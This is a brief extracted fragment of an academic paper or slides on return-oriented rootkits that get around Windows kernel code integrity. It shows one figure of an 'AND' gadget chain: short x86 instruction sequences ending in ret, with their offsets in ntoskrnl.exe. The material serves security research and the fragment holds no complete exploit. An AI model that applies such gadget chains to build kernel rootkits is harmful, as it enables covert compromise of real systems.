eldorado.tu-dortmund.de/server/api/core/bitstreams/a8583de1-bb8b-4acd-bc05-8490bd7a50a5/content
Return-Oriented Rootkits: Bypassing Kernel Code Integrity Protection Mechanisms
(AND)
9
pop ecx | R: ntoskrnl.exe:D88B | L: <RightSource>-124
mov edx, [ecx+0x7c] | R: ntoskrnl.exe:C7B4C pop eax | R: ntoskrnl.exe:B0AE
| L: <LeftSource> mov eax, [eax] | R: ntoskrnl.exe:B13E and eax, edx [...] ntoskrnl.exe:D88B
| L: <Destination> mov [ecx], eax | R: ntoskrnl.exe:45E4
pop ecx ret
mov edx, [ecx+0x7c] ret
pop eax ret
mov eax, [eax] ret
and eax, edx ret
mov [ecx], eax ret
Codebase
AND Gadget
University …
